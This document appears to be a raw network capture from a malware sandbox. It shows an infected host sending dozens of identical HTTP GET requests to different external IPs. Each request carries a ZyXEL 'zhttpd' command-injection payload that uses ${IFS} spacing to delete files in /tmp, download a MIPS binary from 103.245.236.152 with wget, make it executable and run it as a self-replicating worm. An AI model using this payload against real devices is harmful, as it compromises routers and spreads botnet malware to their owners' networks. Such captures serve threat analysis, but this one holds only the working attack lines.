                                      Jan 14, 2024 15:50:51.431616068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5718192.168.2.1456988125.209.34.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431670904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5719192.168.2.1458534188.2.38.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431705952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5720192.168.2.1443888114.62.234.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431750059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5721192.168.2.1447578143.96.2.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431806087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5722192.168.2.145203070.131.128.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431843042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5723192.168.2.146092065.164.32.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431906939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5724192.168.2.1436278160.203.97.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431982040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5725192.168.2.1437374194.73.41.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432038069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5726192.168.2.144234691.170.112.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432087898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5727192.168.2.144856661.122.125.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432142973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5728192.168.2.143304257.177.218.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432204962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5729192.168.2.1452110208.198.249.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432264090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5730192.168.2.145758837.161.107.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432292938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5731192.168.2.144971659.244.144.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.432363987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5732192.168.2.1453582218.103.238.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437303066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5733192.168.2.1436258209.193.134.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437319994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5734192.168.2.143910085.77.191.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437393904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5735192.168.2.145175291.125.141.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437432051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5736192.168.2.1438906210.75.208.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437480927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5737192.168.2.143875296.223.151.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437501907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5738192.168.2.1446258147.64.41.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437551022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5739192.168.2.1435338209.222.221.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437599897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5740192.168.2.1439468146.108.191.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437624931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5741192.168.2.1441960176.64.252.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437678099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5742192.168.2.1455622201.26.214.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437726974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5743192.168.2.1459754206.9.176.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437758923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5744192.168.2.1439516134.132.147.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437796116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5745192.168.2.1452812216.85.241.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437825918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5746192.168.2.1451990203.52.2.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437895060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5747192.168.2.1445712199.211.242.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437923908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5748192.168.2.145349047.50.91.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.437974930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5749192.168.2.143698244.122.62.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432104111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5750192.168.2.145421817.210.101.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432171106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5751192.168.2.1454750185.224.96.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432246923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5752192.168.2.1454694151.172.206.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432279110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5753192.168.2.1453608101.228.101.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432327986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5754192.168.2.145614449.152.14.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432372093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5755192.168.2.1440334159.178.32.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432404995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5756192.168.2.1446364190.97.62.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432451010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5757192.168.2.144931640.219.21.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432496071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5758192.168.2.1435042193.150.153.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432526112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5759192.168.2.143513014.109.250.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432595015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5760192.168.2.144143876.201.80.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432629108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5761192.168.2.144057099.203.241.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432660103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5762192.168.2.1435576107.226.73.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432718992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5763192.168.2.1438726137.133.20.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432763100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5764192.168.2.1447908125.47.131.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432801008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5765192.168.2.1446030208.209.129.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432871103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5766192.168.2.144381270.2.196.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432935953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5767192.168.2.1436212141.37.104.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.432967901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5768192.168.2.1453408192.245.98.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433010101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5769192.168.2.143974014.24.140.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433037996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5770192.168.2.1456496173.29.62.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433089018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5771192.168.2.1447096223.189.71.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433137894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5772192.168.2.1437724151.158.118.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433175087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5773192.168.2.1447414168.97.161.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433213949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5774192.168.2.1450836201.95.131.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433242083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5775192.168.2.143321065.79.41.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433300018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5776192.168.2.1436144111.198.75.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433340073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5777192.168.2.144170258.143.158.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433372021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5778192.168.2.144798247.235.133.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433401108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5779192.168.2.1454708152.144.183.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433442116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5780192.168.2.1440496183.188.190.41443
                                      TimestampBytes transferredDirectionData
